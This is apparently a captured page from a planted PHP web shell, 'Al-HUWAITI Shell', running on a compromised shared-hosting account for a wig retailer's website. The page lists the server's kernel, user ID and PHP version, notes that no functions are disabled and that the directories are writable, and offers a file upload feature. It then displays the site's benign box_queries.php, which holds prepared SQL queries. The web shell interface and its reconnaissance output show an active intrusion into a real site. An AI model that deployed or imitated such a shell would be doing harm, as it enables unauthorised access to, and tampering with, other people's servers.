Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/sabrinaluxebraidedwigs.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/sabrinaluxebraidedwigs.com/public_html/box_queries.php
<?php 
$one=1;
$stmt1 = $con -> prepare('SELECT * FROM boxes WHERE id = ?');
$stmt1 -> bind_param('s',$one);
$stmt1 -> execute(); 
$stmt1 -> store_result(); 
$stmt1 -> bind_result($box_id1,$useless1,$box_link1,$box_link_text1,$box_picture1); 
$numrows1 = $stmt1 -> num_rows();
if($numrows1 > 0){
	while ($stmt1 -> fetch()) { }
}
?>

<?php 
$two=2;
$stmt2 = $con -> prepare('SELECT * FROM boxes WHERE id = ?');
$stmt2 -> bind_param('s',$two);
$stmt2 -> execute(); 
$stmt2 -> store_result(); 
$stmt2 -> bind_result($box_id2,$useless2,$box_link2,$box_link_text2,$box_picture2); 
$numrows2 = $stmt2 -> num_rows();
if($numrows2 > 0){
	while ($stmt2 -> fetch()) { }
}
?>

<?php 
$three=3;
$stmt3 = $con -> prepare('SELECT * FROM boxes WHERE id = ?');
$stmt3 -> bind_param('s',$three);
$stmt3 -> execute(); 
$stmt3 -> store_result(); 
$stmt3 -> bind_result($box_id3,$useless3,$box_link3,$box_link_text3,$box_picture3); 
$numrows3 = $stmt3 -> num_rows();
if($numrows3 > 0){
	while ($stmt3 -> fetch()) { }
}
?>

<?php 
$four=4;
$stmt4 = $con -> prepare('SELECT * FROM boxes WHERE id = ?');
$stmt4 -> bind_param('s',$four);
$stmt4 -> execute(); 
$stmt4 -> store_result(); 
$stmt4 -> bind_result($box_id4,$useless4,$box_link4,$box_link_text4,$box_picture4); 
$numrows4 = $stmt4 -> num_rows();
if($numrows4 > 0){
	while ($stmt4 -> fetch()) { }
}
?>

<?php 
$five=5;
$stmt5 = $con -> prepare('SELECT * FROM boxes WHERE id = ?');
$stmt5 -> bind_param('s',$five);
$stmt5 -> execute(); 
$stmt5 -> store_result(); 
$stmt5 -> bind_result($box_id5,$useless5,$box_link5,$box_link_text5,$box_picture5); 
$numrows5 = $stmt5 -> num_rows();
if($numrows5 > 0){
	while ($stmt5 -> fetch()) { }
}
?>

Al-HUWAITI Shell